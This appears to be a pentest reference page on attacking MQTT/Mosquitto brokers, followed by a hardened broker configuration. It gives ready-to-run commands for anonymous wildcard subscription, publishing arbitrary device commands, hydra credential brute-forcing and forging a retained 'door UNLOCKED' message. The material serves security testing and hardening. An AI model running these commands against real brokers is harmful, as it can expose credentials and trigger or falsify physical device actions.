MQTT (Message Queuing Telemetry Transport) - Port 1883
Basic info
MQTT (Message Queuing Telemetry Transport) is a lightweight messaging protocol for IoT devices, using a publish-subscribe model over TCP/IP. The most popular open-source broker implementation is Mosquitto. Due to minimal configuration and often insecure deployments, MQTT services are frequently vulnerable to attack.
Key characteristics:
Default port: TCP 1883 (unencrypted), 8883 (TLS)
Stateless pub/sub model
Authentication optional
Wildcard topics and retained messages
Discovering MQTT Services via Network Scanning
Nmap Detection of MQTT Brokers
Scan for MQTT using service and version detection:
nmap -sV -p 1883,8883 --script mqtt-subscribe <target-ip>
Useful Nmap NSE scripts:
mqtt-subscribe.nse - connects and subscribes to common topics
mqtt-connect.nse - attempts anonymous authentication
Manual Enumeration with Netcat or Telnet
telnet <target-ip> 1883
A successful connection banner or acknowledgment byte from the broker confirms its presence.
Assessing Authentication and Authorization Mechanisms
Many MQTT brokers allow anonymous access by default. Check this using mosquitto_sub:
mosquitto_sub -h <target-ip> -t '#' -v
If the broker allows wildcard topic subscription without credentials, it is misconfigured and vulnerable.
Try authentication bypass:
mosquitto_sub -h <target-ip> -t '#' -v -u test -P test
Exploiting Publish and Subscribe for Information Disclosure
Read All Topics with Wildcards
mosquitto_sub -h <target-ip> -t '#' -v
This reveals:
Sensor values
Credentials sent by devices
Internal control commands
Presence of retained messages
Publishing Arbitrary Payloads
mosquitto_pub -h <target-ip> -t 'iot/device/command' -m 'REBOOT'
This could trigger real-world actions on connected devices if a device is subscribed to that topic.
Brute Forcing MQTT Credentials
Use hydra for credential brute-force:
hydra -L users.txt -P passwords.txt mqtt://<target-ip>:1883 -V
Persistent Attacks with Retained Messages
Retained messages persist even after the publisher disconnects, making them ideal for:
Persistence payloads
Credential harvesting
Fake sensor data injection
Set retained payload:
mosquitto_pub -h <target-ip> -t 'iot/door/status' -m 'UNLOCKED' -r
When a new subscriber connects, it immediately receives the forged message.
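The weaknesses above (anonymous access, unrestricted '#' subscription, arbitrary publish, retained messages, plaintext 1883) all map to a handful of broker settings. As an added example that is not part of the original page, here is a constructed Mosquitto configuration showing the exposed form beside a hardened one; file paths, the user name and the topic layout are assumptions.

```conf
# --- WEAK: a typical exposed broker (constructed example) ---
listener 1883
allow_anonymous true      # any client may CONNECT with no credentials
# no acl_file: every client can subscribe to '#' and publish to any topic
# retained messages enabled: a forged 'UNLOCKED' outlives its publisher

# --- HARDENED: one setting per weakness described above ---
# Listen on TLS only; do not expose plaintext 1883 at all.
listener 8883
cafile   /etc/mosquitto/certs/ca.crt        # assumed paths
certfile /etc/mosquitto/certs/broker.crt
keyfile  /etc/mosquitto/certs/broker.key
tls_version tlsv1.2

allow_anonymous false                       # defeats the unauthenticated 'mosquitto_sub -t #' check
password_file /etc/mosquitto/passwd         # create with: mosquitto_passwd -c /etc/mosquitto/passwd <user>
acl_file      /etc/mosquitto/acl            # per-user topic permissions, contents below

retain_available false                      # Mosquitto 2.x: the broker rejects the -r flag outright
max_connections 200                         # caps connection floods; pair with a host firewall for rate limits
connection_messages true                    # log every CONNECT/DISCONNECT so guessing attempts are visible
log_type all
log_dest file /var/log/mosquitto/mosquitto.log

# --- /etc/mosquitto/acl (assumed path; separate file) ---
# pattern rules apply to every authenticated user, %u = that user's name.
# A device may publish only its own status and read only its own commands,
# so no single credential can read '#' or publish to another device's command topic.
pattern write iot/%u/status
pattern read  iot/%u/command

# The dashboard account may watch all statuses but never publish commands.
user dashboard
topic read iot/+/status
```

With this in place, the anonymous and wildcard checks from the sections above fail at CONNECT or SUBSCRIBE, and each refusal is written to the log with the client's address for detection.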